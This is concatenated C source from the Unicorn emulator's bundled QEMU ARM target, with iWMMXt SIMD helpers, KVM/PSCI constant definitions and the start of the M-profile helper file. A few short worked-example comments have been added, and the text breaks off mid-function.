SIMD_ZBIT, 5) | \ SIMD8_SET(ZBIT8((a >> 48) & 0xff), SIMD_ZBIT, 6) | \ SIMD8_SET(ZBIT8((a >> 56) & 0xff), SIMD_ZBIT, 7); \ return a; \ } IWMMXT_OP_AVGB(0) IWMMXT_OP_AVGB(1) #undef IWMMXT_OP_AVGB #undef AVGB #define AVGW(SHR) ((( \ ((a >> SHR) & 0xffff) + ((b >> SHR) & 0xffff) + round) >> 1) << SHR) #define IWMMXT_OP_AVGW(r) \ uint64_t HELPER(iwmmxt_avgw##r)(CPUARMState *env, uint64_t a, uint64_t b) \ { \ const int round = r; \ a = AVGW(0) | AVGW(16) | AVGW(32) | AVGW(48); \ env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = \ SIMD16_SET(ZBIT16((a >> 0) & 0xffff), SIMD_ZBIT, 0) | \ SIMD16_SET(ZBIT16((a >> 16) & 0xffff), SIMD_ZBIT, 1) | \ SIMD16_SET(ZBIT16((a >> 32) & 0xffff), SIMD_ZBIT, 2) | \ SIMD16_SET(ZBIT16((a >> 48) & 0xffff), SIMD_ZBIT, 3); \ return a; \ } IWMMXT_OP_AVGW(0) IWMMXT_OP_AVGW(1) #undef IWMMXT_OP_AVGW #undef AVGW uint64_t HELPER(iwmmxt_align)(uint64_t a, 
uint64_t b, uint32_t n)
{
    a >>= n << 3;
    a |= b << (64 - (n << 3));
    return a;
}

uint64_t HELPER(iwmmxt_insr)(uint64_t x, uint32_t a, uint32_t b, uint32_t n)
{
    x &= ~((uint64_t) b << n);
    x |= (uint64_t) (a & b) << n;
    return x;
}

uint32_t HELPER(iwmmxt_setpsr_nz)(uint64_t x)
{
    return SIMD64_SET((x == 0), SIMD_ZBIT) |
           SIMD64_SET((x & (1ULL << 63)), SIMD_NBIT);
}

uint64_t HELPER(iwmmxt_bcstb)(uint32_t arg)
{
    arg &= 0xff;
    return
        ((uint64_t) arg << 0 ) | ((uint64_t) arg << 8 ) |
        ((uint64_t) arg << 16) | ((uint64_t) arg << 24) |
        ((uint64_t) arg << 32) | ((uint64_t) arg << 40) |
        ((uint64_t) arg << 48) | ((uint64_t) arg << 56);
}

uint64_t HELPER(iwmmxt_bcstw)(uint32_t arg)
{
    arg &= 0xffff;
    return
        ((uint64_t) arg << 0 ) | ((uint64_t) arg << 16) |
        ((uint64_t) arg << 32) | ((uint64_t) arg << 48);
}

uint64_t HELPER(iwmmxt_bcstl)(uint32_t arg)
{
    return arg | ((uint64_t) arg << 32);
}

uint64_t HELPER(iwmmxt_addcb)(uint64_t x)
{
    return
        ((x >> 0) & 0xff) + ((x >> 8) & 0xff) +
        ((x >> 16) & 0xff) + ((x >> 24) & 0xff) +
        ((x >> 32) & 0xff) + ((x >> 40) & 0xff) +
        ((x >> 48) & 0xff) + ((x >> 56) & 0xff);
}

uint64_t HELPER(iwmmxt_addcw)(uint64_t x)
{
    return
        ((x >> 0) & 0xffff) + ((x >> 16) & 0xffff) +
        ((x >> 32) & 0xffff) + ((x >> 48) & 0xffff);
}

uint64_t HELPER(iwmmxt_addcl)(uint64_t x)
{
    return (x & 0xffffffff) + (x >> 32);
}

uint32_t HELPER(iwmmxt_msbb)(uint64_t x)
{
    return
        ((x >> 7) & 0x01) | ((x >> 14) & 0x02) |
        ((x >> 21) & 0x04) | ((x >> 28) & 0x08) |
        ((x >> 35) & 0x10) | ((x >> 42) & 0x20) |
        ((x >> 49) & 0x40) | ((x >> 56) & 0x80);
}

uint32_t HELPER(iwmmxt_msbw)(uint64_t x)
{
    /* Gather the sign bit of each 16-bit lane (bits 15/31/47/63) into
     * bits 0..3. The shift for lane 3 must be 60 (not 52) so that bit 63,
     * not bit 55, is sampled.
     */
    return
        ((x >> 15) & 0x01) | ((x >> 30) & 0x02) |
        ((x >> 45) & 0x04) | ((x >> 60) & 0x08);
}

uint32_t HELPER(iwmmxt_msbl)(uint64_t x)
{
    return ((x >> 31) & 0x01) | ((x >> 62) & 0x02);
}

/* FIXME: Split wCASF setting into a separate op to avoid env use.
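*/

/*
 * Added worked example (hypothetical function): iwmmxt_bcstw() keeps only
 * the low halfword of its argument and replicates it into all four lanes.
 */
static inline uint64_t bcstw_sketch(void)
{
    /* 0x1234abcd & 0xffff == 0xabcd, broadcast to every 16-bit lane */
    return helper_iwmmxt_bcstw(0x1234abcd); /* 0xabcdabcdabcdabcdULL */
}

/* Shift and rotate helpers; per the FIXME above, they also set wCASF: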
*/ uint64_t HELPER(iwmmxt_srlw)(CPUARMState *env, uint64_t x, uint32_t n) { x = (((x & (0xffffll << 0)) >> n) & (0xffffll << 0)) | (((x & (0xffffll << 16)) >> n) & (0xffffll << 16)) | (((x & (0xffffll << 32)) >> n) & (0xffffll << 32)) | (((x & (0xffffll << 48)) >> n) & (0xffffll << 48)); env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = NZBIT16(x >> 0, 0) | NZBIT16(x >> 16, 1) | NZBIT16(x >> 32, 2) | NZBIT16(x >> 48, 3); return x; } uint64_t HELPER(iwmmxt_srll)(CPUARMState *env, uint64_t x, uint32_t n) { x = ((x & (0xffffffffll << 0)) >> n) | ((x >> n) & (0xffffffffll << 32)); env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = NZBIT32(x >> 0, 0) | NZBIT32(x >> 32, 1); return x; } uint64_t HELPER(iwmmxt_srlq)(CPUARMState *env, uint64_t x, uint32_t n) { x >>= n; env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = NZBIT64(x); return x; } uint64_t HELPER(iwmmxt_sllw)(CPUARMState *env, uint64_t x, uint32_t n) { x = (((x & (0xffffll << 0)) << n) & (0xffffll << 0)) | (((x & (0xffffll << 16)) << n) & (0xffffll << 16)) | (((x & (0xffffll << 32)) << n) & (0xffffll << 32)) | (((x & (0xffffll << 48)) << n) & (0xffffll << 48)); env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = NZBIT16(x >> 0, 0) | NZBIT16(x >> 16, 1) | NZBIT16(x >> 32, 2) | NZBIT16(x >> 48, 3); return x; } uint64_t HELPER(iwmmxt_slll)(CPUARMState *env, uint64_t x, uint32_t n) { x = ((x << n) & (0xffffffffll << 0)) | ((x & (0xffffffffll << 32)) << n); env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = NZBIT32(x >> 0, 0) | NZBIT32(x >> 32, 1); return x; } uint64_t HELPER(iwmmxt_sllq)(CPUARMState *env, uint64_t x, uint32_t n) { x <<= n; env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = NZBIT64(x); return x; } uint64_t HELPER(iwmmxt_sraw)(CPUARMState *env, uint64_t x, uint32_t n) { x = ((uint64_t) ((EXTEND16(x >> 0) >> n) & 0xffff) << 0) | ((uint64_t) ((EXTEND16(x >> 16) >> n) & 0xffff) << 16) | ((uint64_t) ((EXTEND16(x >> 32) >> n) & 0xffff) << 32) | ((uint64_t) ((EXTEND16(x >> 48) >> n) & 0xffff) << 48); env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = NZBIT16(x >> 0, 0) | NZBIT16(x >> 16, 1) | NZBIT16(x >> 32, 2) | NZBIT16(x >> 48, 3); return x; } uint64_t HELPER(iwmmxt_sral)(CPUARMState *env, uint64_t x, uint32_t n) { x = (((EXTEND32(x >> 0) >> n) & 0xffffffff) << 0) | (((EXTEND32(x >> 32) >> n) & 0xffffffff) << 32); env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = NZBIT32(x >> 0, 0) | NZBIT32(x >> 32, 1); return x; } uint64_t HELPER(iwmmxt_sraq)(CPUARMState *env, uint64_t x, uint32_t n) { x = (int64_t) x >> n; env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = NZBIT64(x); return x; } uint64_t HELPER(iwmmxt_rorw)(CPUARMState *env, uint64_t x, uint32_t n) { x = ((((x & (0xffffll << 0)) >> n) | ((x & (0xffffll << 0)) << (16 - n))) & (0xffffll << 0)) | ((((x & (0xffffll << 16)) >> n) | ((x & (0xffffll << 16)) << (16 - n))) & (0xffffll << 16)) | ((((x & (0xffffll << 32)) >> n) | ((x & (0xffffll << 32)) << (16 - n))) & (0xffffll << 32)) | ((((x & (0xffffll << 48)) >> n) | ((x & (0xffffll << 48)) << (16 - n))) & (0xffffll << 48)); env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = NZBIT16(x >> 0, 0) | NZBIT16(x >> 16, 1) | NZBIT16(x >> 32, 2) | NZBIT16(x >> 48, 3); return x; } uint64_t HELPER(iwmmxt_rorl)(CPUARMState *env, uint64_t x, uint32_t n) { x = ((x & (0xffffffffll << 0)) >> n) | ((x >> n) & (0xffffffffll << 32)) | ((x << (32 - n)) & (0xffffffffll << 0)) | ((x & (0xffffffffll << 32)) << (32 - n)); env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = NZBIT32(x >> 0, 0) | NZBIT32(x >> 32, 1); return x; } uint64_t HELPER(iwmmxt_rorq)(CPUARMState *env, uint64_t x, uint32_t n) { x = ror64(x, n); env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = NZBIT64(x); return x; } uint64_t 
HELPER(iwmmxt_shufh)(CPUARMState *env, uint64_t x, uint32_t n) { x = (((x >> ((n << 4) & 0x30)) & 0xffff) << 0) | (((x >> ((n << 2) & 0x30)) & 0xffff) << 16) | (((x >> ((n << 0) & 0x30)) & 0xffff) << 32) | (((x >> ((n >> 2) & 0x30)) & 0xffff) << 48); env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = NZBIT16(x >> 0, 0) | NZBIT16(x >> 16, 1) | NZBIT16(x >> 32, 2) | NZBIT16(x >> 48, 3); return x; } /* TODO: Unsigned-Saturation */ uint64_t HELPER(iwmmxt_packuw)(CPUARMState *env, uint64_t a, uint64_t b) { a = (((a >> 0) & 0xff) << 0) | (((a >> 16) & 0xff) << 8) | (((a >> 32) & 0xff) << 16) | (((a >> 48) & 0xff) << 24) | (((b >> 0) & 0xff) << 32) | (((b >> 16) & 0xff) << 40) | (((b >> 32) & 0xff) << 48) | (((b >> 48) & 0xff) << 56); env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = NZBIT8(a >> 0, 0) | NZBIT8(a >> 8, 1) | NZBIT8(a >> 16, 2) | NZBIT8(a >> 24, 3) | NZBIT8(a >> 32, 4) | NZBIT8(a >> 40, 5) | NZBIT8(a >> 48, 6) | NZBIT8(a >> 56, 7); return a; } uint64_t HELPER(iwmmxt_packul)(CPUARMState *env, uint64_t a, uint64_t b) { a = (((a >> 0) & 0xffff) << 0) | (((a >> 32) & 0xffff) << 16) | (((b >> 0) & 0xffff) << 32) | (((b >> 32) & 0xffff) << 48); env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = NZBIT16(a >> 0, 0) | NZBIT16(a >> 16, 1) | NZBIT16(a >> 32, 2) | NZBIT16(a >> 48, 3); return a; } uint64_t HELPER(iwmmxt_packuq)(CPUARMState *env, uint64_t a, uint64_t b) { a = (a & 0xffffffff) | ((b & 0xffffffff) << 32); env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = NZBIT32(a >> 0, 0) | NZBIT32(a >> 32, 1); return a; } /* TODO: Signed-Saturation */ uint64_t HELPER(iwmmxt_packsw)(CPUARMState *env, uint64_t a, uint64_t b) { a = (((a >> 0) & 0xff) << 0) | (((a >> 16) & 0xff) << 8) | (((a >> 32) & 0xff) << 16) | (((a >> 48) & 0xff) << 24) | (((b >> 0) & 0xff) << 32) | (((b >> 16) & 0xff) << 40) | (((b >> 32) & 0xff) << 48) | (((b >> 48) & 0xff) << 56); env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = NZBIT8(a >> 0, 0) | NZBIT8(a >> 8, 1) | NZBIT8(a >> 16, 2) | NZBIT8(a >> 24, 3) | NZBIT8(a >> 32, 4) | NZBIT8(a >> 40, 5) | NZBIT8(a >> 48, 6) | NZBIT8(a >> 56, 7); return a; } uint64_t HELPER(iwmmxt_packsl)(CPUARMState *env, uint64_t a, uint64_t b) { a = (((a >> 0) & 0xffff) << 0) | (((a >> 32) & 0xffff) << 16) | (((b >> 0) & 0xffff) << 32) | (((b >> 32) & 0xffff) << 48); env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = NZBIT16(a >> 0, 0) | NZBIT16(a >> 16, 1) | NZBIT16(a >> 32, 2) | NZBIT16(a >> 48, 3); return a; } uint64_t HELPER(iwmmxt_packsq)(CPUARMState *env, uint64_t a, uint64_t b) { a = (a & 0xffffffff) | ((b & 0xffffffff) << 32); env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = NZBIT32(a >> 0, 0) | NZBIT32(a >> 32, 1); return a; } uint64_t HELPER(iwmmxt_muladdsl)(uint64_t c, uint32_t a, uint32_t b) { return c + ((int32_t) EXTEND32(a) * (int32_t) EXTEND32(b)); } uint64_t HELPER(iwmmxt_muladdsw)(uint64_t c, uint32_t a, uint32_t b) { c += EXTEND32(EXTEND16S((a >> 0) & 0xffff) * EXTEND16S((b >> 0) & 0xffff)); c += EXTEND32(EXTEND16S((a >> 16) & 0xffff) * EXTEND16S((b >> 16) & 0xffff)); return c; } uint64_t HELPER(iwmmxt_muladdswl)(uint64_t c, uint32_t a, uint32_t b) { return c + (EXTEND32(EXTEND16S(a & 0xffff) * EXTEND16S(b & 0xffff))); } 
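/*
 * Added worked example (hypothetical function): iwmmxt_muladdswl()
 * multiplies the low signed halfwords of its two operands and
 * accumulates the sign-extended product.
 */
static inline uint64_t muladdswl_sketch(void)
{
    /* 0xfffe is -2 as int16_t; 100 + (-2 * 3) == 94 */
    return helper_iwmmxt_muladdswl(100, 0xfffe, 3);
}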
/* ==== file: unicorn-2.1.1/qemu/target/arm/kvm-consts.h ==== */

/*
 * KVM ARM ABI constant definitions
 *
 * Copyright (c) 2013 Linaro Limited
 *
 * Provide versions of KVM constant defines that can be used even
 * when CONFIG_KVM is not set and we don't have access to the
 * KVM headers. If CONFIG_KVM is set, we do a compile-time check
 * that we haven't got out of sync somehow.
 *
 * This work is licensed under the terms of the GNU GPL, version 2 or later.
 * See the COPYING file in the top-level directory.
 */

#ifndef ARM_KVM_CONSTS_H
#define ARM_KVM_CONSTS_H

#ifdef CONFIG_KVM
#include <linux/kvm.h>
#include <linux/psci.h>
#define MISMATCH_CHECK(X, Y) QEMU_BUILD_BUG_ON(X != Y)
#else
#define MISMATCH_CHECK(X, Y) QEMU_BUILD_BUG_ON(0)
#endif

#define CP_REG_SIZE_SHIFT 52
#define CP_REG_SIZE_MASK  0x00f0000000000000ULL
#define CP_REG_SIZE_U32   0x0020000000000000ULL
#define CP_REG_SIZE_U64   0x0030000000000000ULL
#define CP_REG_ARM        0x4000000000000000ULL
#define CP_REG_ARCH_MASK  0xff00000000000000ULL

MISMATCH_CHECK(CP_REG_SIZE_SHIFT, KVM_REG_SIZE_SHIFT);
MISMATCH_CHECK(CP_REG_SIZE_MASK, KVM_REG_SIZE_MASK);
MISMATCH_CHECK(CP_REG_SIZE_U32, KVM_REG_SIZE_U32);
MISMATCH_CHECK(CP_REG_SIZE_U64, KVM_REG_SIZE_U64);
MISMATCH_CHECK(CP_REG_ARM, KVM_REG_ARM);
MISMATCH_CHECK(CP_REG_ARCH_MASK, KVM_REG_ARCH_MASK);

#define QEMU_PSCI_0_1_FN_BASE 0x95c1ba5e
#define QEMU_PSCI_0_1_FN(n) (QEMU_PSCI_0_1_FN_BASE + (n))
#define QEMU_PSCI_0_1_FN_CPU_SUSPEND QEMU_PSCI_0_1_FN(0)
#define QEMU_PSCI_0_1_FN_CPU_OFF QEMU_PSCI_0_1_FN(1)
#define QEMU_PSCI_0_1_FN_CPU_ON QEMU_PSCI_0_1_FN(2)
#define QEMU_PSCI_0_1_FN_MIGRATE QEMU_PSCI_0_1_FN(3)

MISMATCH_CHECK(QEMU_PSCI_0_1_FN_CPU_SUSPEND, KVM_PSCI_FN_CPU_SUSPEND);
MISMATCH_CHECK(QEMU_PSCI_0_1_FN_CPU_OFF, KVM_PSCI_FN_CPU_OFF);
MISMATCH_CHECK(QEMU_PSCI_0_1_FN_CPU_ON, KVM_PSCI_FN_CPU_ON);
MISMATCH_CHECK(QEMU_PSCI_0_1_FN_MIGRATE, KVM_PSCI_FN_MIGRATE);

#define QEMU_PSCI_0_2_FN_BASE 0x84000000
#define QEMU_PSCI_0_2_FN(n) (QEMU_PSCI_0_2_FN_BASE + (n))

#define QEMU_PSCI_0_2_64BIT 0x40000000
#define QEMU_PSCI_0_2_FN64_BASE \
    (QEMU_PSCI_0_2_FN_BASE + QEMU_PSCI_0_2_64BIT)
#define QEMU_PSCI_0_2_FN64(n) (QEMU_PSCI_0_2_FN64_BASE + (n))

#define QEMU_PSCI_0_2_FN_PSCI_VERSION QEMU_PSCI_0_2_FN(0)
#define QEMU_PSCI_0_2_FN_CPU_SUSPEND QEMU_PSCI_0_2_FN(1)
#define QEMU_PSCI_0_2_FN_CPU_OFF QEMU_PSCI_0_2_FN(2)
#define QEMU_PSCI_0_2_FN_CPU_ON QEMU_PSCI_0_2_FN(3)
#define QEMU_PSCI_0_2_FN_AFFINITY_INFO QEMU_PSCI_0_2_FN(4)
#define QEMU_PSCI_0_2_FN_MIGRATE QEMU_PSCI_0_2_FN(5)
#define QEMU_PSCI_0_2_FN_MIGRATE_INFO_TYPE QEMU_PSCI_0_2_FN(6)
#define QEMU_PSCI_0_2_FN_MIGRATE_INFO_UP_CPU QEMU_PSCI_0_2_FN(7)
#define QEMU_PSCI_0_2_FN_SYSTEM_OFF \
QEMU_PSCI_0_2_FN(8) #define QEMU_PSCI_0_2_FN_SYSTEM_RESET QEMU_PSCI_0_2_FN(9) #define QEMU_PSCI_0_2_FN64_CPU_SUSPEND QEMU_PSCI_0_2_FN64(1) #define QEMU_PSCI_0_2_FN64_CPU_OFF QEMU_PSCI_0_2_FN64(2) #define QEMU_PSCI_0_2_FN64_CPU_ON QEMU_PSCI_0_2_FN64(3) #define QEMU_PSCI_0_2_FN64_AFFINITY_INFO QEMU_PSCI_0_2_FN64(4) #define QEMU_PSCI_0_2_FN64_MIGRATE QEMU_PSCI_0_2_FN64(5) MISMATCH_CHECK(QEMU_PSCI_0_2_FN_CPU_SUSPEND, PSCI_0_2_FN_CPU_SUSPEND); MISMATCH_CHECK(QEMU_PSCI_0_2_FN_CPU_OFF, PSCI_0_2_FN_CPU_OFF); MISMATCH_CHECK(QEMU_PSCI_0_2_FN_CPU_ON, PSCI_0_2_FN_CPU_ON); MISMATCH_CHECK(QEMU_PSCI_0_2_FN_MIGRATE, PSCI_0_2_FN_MIGRATE); MISMATCH_CHECK(QEMU_PSCI_0_2_FN64_CPU_SUSPEND, PSCI_0_2_FN64_CPU_SUSPEND); MISMATCH_CHECK(QEMU_PSCI_0_2_FN64_CPU_ON, PSCI_0_2_FN64_CPU_ON); MISMATCH_CHECK(QEMU_PSCI_0_2_FN64_MIGRATE, PSCI_0_2_FN64_MIGRATE); /* PSCI v0.2 return values used by TCG emulation of PSCI */ /* No Trusted OS migration to worry about when offlining CPUs */ #define QEMU_PSCI_0_2_RET_TOS_MIGRATION_NOT_REQUIRED 2 /* We implement version 0.2 only */ #define QEMU_PSCI_0_2_RET_VERSION_0_2 2 MISMATCH_CHECK(QEMU_PSCI_0_2_RET_TOS_MIGRATION_NOT_REQUIRED, PSCI_0_2_TOS_MP); MISMATCH_CHECK(QEMU_PSCI_0_2_RET_VERSION_0_2, (PSCI_VERSION_MAJOR(0) | PSCI_VERSION_MINOR(2))); /* PSCI return values (inclusive of all PSCI versions) */ #define QEMU_PSCI_RET_SUCCESS 0 #define QEMU_PSCI_RET_NOT_SUPPORTED -1 #define QEMU_PSCI_RET_INVALID_PARAMS -2 #define QEMU_PSCI_RET_DENIED -3 #define QEMU_PSCI_RET_ALREADY_ON -4 #define QEMU_PSCI_RET_ON_PENDING -5 #define QEMU_PSCI_RET_INTERNAL_FAILURE -6 #define QEMU_PSCI_RET_NOT_PRESENT -7 #define QEMU_PSCI_RET_DISABLED -8 MISMATCH_CHECK(QEMU_PSCI_RET_SUCCESS, PSCI_RET_SUCCESS); MISMATCH_CHECK(QEMU_PSCI_RET_NOT_SUPPORTED, PSCI_RET_NOT_SUPPORTED); MISMATCH_CHECK(QEMU_PSCI_RET_INVALID_PARAMS, PSCI_RET_INVALID_PARAMS); MISMATCH_CHECK(QEMU_PSCI_RET_DENIED, PSCI_RET_DENIED); MISMATCH_CHECK(QEMU_PSCI_RET_ALREADY_ON, PSCI_RET_ALREADY_ON); MISMATCH_CHECK(QEMU_PSCI_RET_ON_PENDING, PSCI_RET_ON_PENDING); MISMATCH_CHECK(QEMU_PSCI_RET_INTERNAL_FAILURE, PSCI_RET_INTERNAL_FAILURE); MISMATCH_CHECK(QEMU_PSCI_RET_NOT_PRESENT, PSCI_RET_NOT_PRESENT); MISMATCH_CHECK(QEMU_PSCI_RET_DISABLED, PSCI_RET_DISABLED); /* Note that KVM uses overlapping values for AArch32 and AArch64 * target CPU numbers. 
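*/

/*
 * Added worked example (hypothetical function): an SMC64 PSCI function ID
 * is the SMC32 ID with the 64-bit calling-convention bit added, so
 * QEMU_PSCI_0_2_FN64_CPU_ON is 0x84000000 + 0x40000000 + 3 == 0xc4000003.
 */
static inline uint32_t psci_fn64_cpu_on_sketch(void)
{
    return QEMU_PSCI_0_2_FN64(3); /* == QEMU_PSCI_0_2_FN64_CPU_ON */
}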
/* AArch32 targets: */
#define QEMU_KVM_ARM_TARGET_CORTEX_A15 0
#define QEMU_KVM_ARM_TARGET_CORTEX_A7 1

/* AArch64 targets: */
#define QEMU_KVM_ARM_TARGET_AEM_V8 0
#define QEMU_KVM_ARM_TARGET_FOUNDATION_V8 1
#define QEMU_KVM_ARM_TARGET_CORTEX_A57 2
#define QEMU_KVM_ARM_TARGET_XGENE_POTENZA 3
#define QEMU_KVM_ARM_TARGET_CORTEX_A53 4

/* There's no kernel define for this: sentinel value which
 * matches no KVM target value for either 64 or 32 bit
 */
#define QEMU_KVM_ARM_TARGET_NONE UINT_MAX

#ifdef TARGET_AARCH64
MISMATCH_CHECK(QEMU_KVM_ARM_TARGET_AEM_V8, KVM_ARM_TARGET_AEM_V8);
MISMATCH_CHECK(QEMU_KVM_ARM_TARGET_FOUNDATION_V8, KVM_ARM_TARGET_FOUNDATION_V8);
MISMATCH_CHECK(QEMU_KVM_ARM_TARGET_CORTEX_A57, KVM_ARM_TARGET_CORTEX_A57);
MISMATCH_CHECK(QEMU_KVM_ARM_TARGET_XGENE_POTENZA, KVM_ARM_TARGET_XGENE_POTENZA);
MISMATCH_CHECK(QEMU_KVM_ARM_TARGET_CORTEX_A53, KVM_ARM_TARGET_CORTEX_A53);
#else
MISMATCH_CHECK(QEMU_KVM_ARM_TARGET_CORTEX_A15, KVM_ARM_TARGET_CORTEX_A15);
MISMATCH_CHECK(QEMU_KVM_ARM_TARGET_CORTEX_A7, KVM_ARM_TARGET_CORTEX_A7);
#endif

#define CP_REG_ARM64                  0x6000000000000000ULL
#define CP_REG_ARM_COPROC_MASK        0x000000000FFF0000
#define CP_REG_ARM_COPROC_SHIFT       16
#define CP_REG_ARM64_SYSREG           (0x0013 << CP_REG_ARM_COPROC_SHIFT)
#define CP_REG_ARM64_SYSREG_OP0_MASK  0x000000000000c000
#define CP_REG_ARM64_SYSREG_OP0_SHIFT 14
#define CP_REG_ARM64_SYSREG_OP1_MASK  0x0000000000003800
#define CP_REG_ARM64_SYSREG_OP1_SHIFT 11
#define CP_REG_ARM64_SYSREG_CRN_MASK  0x0000000000000780
#define CP_REG_ARM64_SYSREG_CRN_SHIFT 7
#define CP_REG_ARM64_SYSREG_CRM_MASK  0x0000000000000078
#define CP_REG_ARM64_SYSREG_CRM_SHIFT 3
#define CP_REG_ARM64_SYSREG_OP2_MASK  0x0000000000000007
#define CP_REG_ARM64_SYSREG_OP2_SHIFT 0

/* No kernel define but it's useful to QEMU */
#define CP_REG_ARM64_SYSREG_CP (CP_REG_ARM64_SYSREG >> CP_REG_ARM_COPROC_SHIFT)

#ifdef TARGET_AARCH64
MISMATCH_CHECK(CP_REG_ARM64, KVM_REG_ARM64);
MISMATCH_CHECK(CP_REG_ARM_COPROC_MASK, KVM_REG_ARM_COPROC_MASK);
MISMATCH_CHECK(CP_REG_ARM_COPROC_SHIFT, KVM_REG_ARM_COPROC_SHIFT);
MISMATCH_CHECK(CP_REG_ARM64_SYSREG, KVM_REG_ARM64_SYSREG);
MISMATCH_CHECK(CP_REG_ARM64_SYSREG_OP0_MASK, KVM_REG_ARM64_SYSREG_OP0_MASK);
MISMATCH_CHECK(CP_REG_ARM64_SYSREG_OP0_SHIFT, KVM_REG_ARM64_SYSREG_OP0_SHIFT);
MISMATCH_CHECK(CP_REG_ARM64_SYSREG_OP1_MASK, KVM_REG_ARM64_SYSREG_OP1_MASK);
MISMATCH_CHECK(CP_REG_ARM64_SYSREG_OP1_SHIFT, KVM_REG_ARM64_SYSREG_OP1_SHIFT);
MISMATCH_CHECK(CP_REG_ARM64_SYSREG_CRN_MASK, KVM_REG_ARM64_SYSREG_CRN_MASK);
MISMATCH_CHECK(CP_REG_ARM64_SYSREG_CRN_SHIFT, KVM_REG_ARM64_SYSREG_CRN_SHIFT);
MISMATCH_CHECK(CP_REG_ARM64_SYSREG_CRM_MASK, KVM_REG_ARM64_SYSREG_CRM_MASK);
MISMATCH_CHECK(CP_REG_ARM64_SYSREG_CRM_SHIFT, KVM_REG_ARM64_SYSREG_CRM_SHIFT);
MISMATCH_CHECK(CP_REG_ARM64_SYSREG_OP2_MASK, KVM_REG_ARM64_SYSREG_OP2_MASK);
MISMATCH_CHECK(CP_REG_ARM64_SYSREG_OP2_SHIFT, KVM_REG_ARM64_SYSREG_OP2_SHIFT);
#endif

#undef MISMATCH_CHECK

#endif

/* ==== file: unicorn-2.1.1/qemu/target/arm/m_helper.c ==== */

/*
 * ARM generic helpers.
 *
 * This code is licensed under the GNU GPL v2 or later.
* * SPDX-License-Identifier: GPL-2.0-or-later */ #include "qemu/osdep.h" #include "qemu/units.h" #include "cpu.h" #include "internals.h" #include "exec/helper-proto.h" #include "qemu/host-utils.h" #include "qemu/bitops.h" #include "qemu/crc32c.h" #include "exec/exec-all.h" #include "sysemu/cpus.h" #include "qemu/range.h" #include "qemu/guest-random.h" #include "arm_ldst.h" #include "exec/cpu_ldst.h" static void v7m_msr_xpsr(CPUARMState *env, uint32_t mask, uint32_t reg, uint32_t val) { /* Only APSR is actually writable */ if (!(reg & 4)) { uint32_t apsrmask = 0; if (mask & 8) { apsrmask |= XPSR_NZCV | XPSR_Q; } if ((mask & 4) && arm_feature(env, ARM_FEATURE_THUMB_DSP)) { apsrmask |= XPSR_GE; } xpsr_write(env, val, apsrmask); } } static uint32_t v7m_mrs_xpsr(CPUARMState *env, uint32_t reg, unsigned el) { uint32_t mask = 0; if ((reg & 1) && el) { mask |= XPSR_EXCP; /* IPSR (unpriv. reads as zero) */ } if (!(reg & 4)) { mask |= XPSR_NZCV | XPSR_Q; /* APSR */ if (arm_feature(env, ARM_FEATURE_THUMB_DSP)) { mask |= XPSR_GE; } } /* EPSR reads as zero */ return xpsr_read(env) & mask; } static uint32_t v7m_mrs_control(CPUARMState *env, uint32_t secure) { uint32_t value = env->v7m.control[secure]; if (!secure) { /* SFPA is RAZ/WI from NS; FPCA is stored in the M_REG_S bank */ value |= env->v7m.control[M_REG_S] & R_V7M_CONTROL_FPCA_MASK; } return value; } /* * What kind of stack write are we doing? This affects how exceptions * generated during the stacking are treated. */ typedef enum StackingMode { STACK_NORMAL, STACK_IGNFAULTS, STACK_LAZYFP, } StackingMode; static bool v7m_stack_write(ARMCPU *cpu, uint32_t addr, uint32_t value, ARMMMUIdx mmu_idx, StackingMode mode) { CPUState *cs = CPU(cpu); CPUARMState *env = &cpu->env; MemTxAttrs attrs = { 0 }; MemTxResult txres; target_ulong page_size; hwaddr physaddr; int prot; ARMMMUFaultInfo fi = { 0 }; bool secure = mmu_idx & ARM_MMU_IDX_M_S; // int exc; // bool exc_secure; if (get_phys_addr(env, addr, MMU_DATA_STORE, mmu_idx, &physaddr, &attrs, &prot, &page_size, &fi, NULL)) { /* MPU/SAU lookup failed */ if (fi.type == ARMFault_QEMU_SFault) { if (mode == STACK_LAZYFP) { qemu_log_mask(CPU_LOG_INT, "...SecureFault with SFSR.LSPERR " "during lazy stacking\n"); env->v7m.sfsr |= R_V7M_SFSR_LSPERR_MASK; } else { qemu_log_mask(CPU_LOG_INT, "...SecureFault with SFSR.AUVIOL " "during stacking\n"); env->v7m.sfsr |= R_V7M_SFSR_AUVIOL_MASK; } env->v7m.sfsr |= R_V7M_SFSR_SFARVALID_MASK; env->v7m.sfar = addr; // exc = ARMV7M_EXCP_SECURE; // exc_secure = false; } else { if (mode == STACK_LAZYFP) { qemu_log_mask(CPU_LOG_INT, "...MemManageFault with CFSR.MLSPERR\n"); env->v7m.cfsr[secure] |= R_V7M_CFSR_MLSPERR_MASK; } else { qemu_log_mask(CPU_LOG_INT, "...MemManageFault with CFSR.MSTKERR\n"); env->v7m.cfsr[secure] |= R_V7M_CFSR_MSTKERR_MASK; } // exc = ARMV7M_EXCP_MEM; // exc_secure = secure; } goto pend_fault; } #ifdef UNICORN_ARCH_POSTFIX glue(address_space_stl_le, UNICORN_ARCH_POSTFIX)(cs->uc, arm_addressspace(cs, attrs), physaddr, value, #else address_space_stl_le(cs->uc, arm_addressspace(cs, attrs), physaddr, value, #endif attrs, &txres); if (txres != MEMTX_OK) { /* BusFault trying to write the data */ if (mode == STACK_LAZYFP) { qemu_log_mask(CPU_LOG_INT, "...BusFault with BFSR.LSPERR\n"); env->v7m.cfsr[M_REG_NS] |= R_V7M_CFSR_LSPERR_MASK; } else { qemu_log_mask(CPU_LOG_INT, "...BusFault with 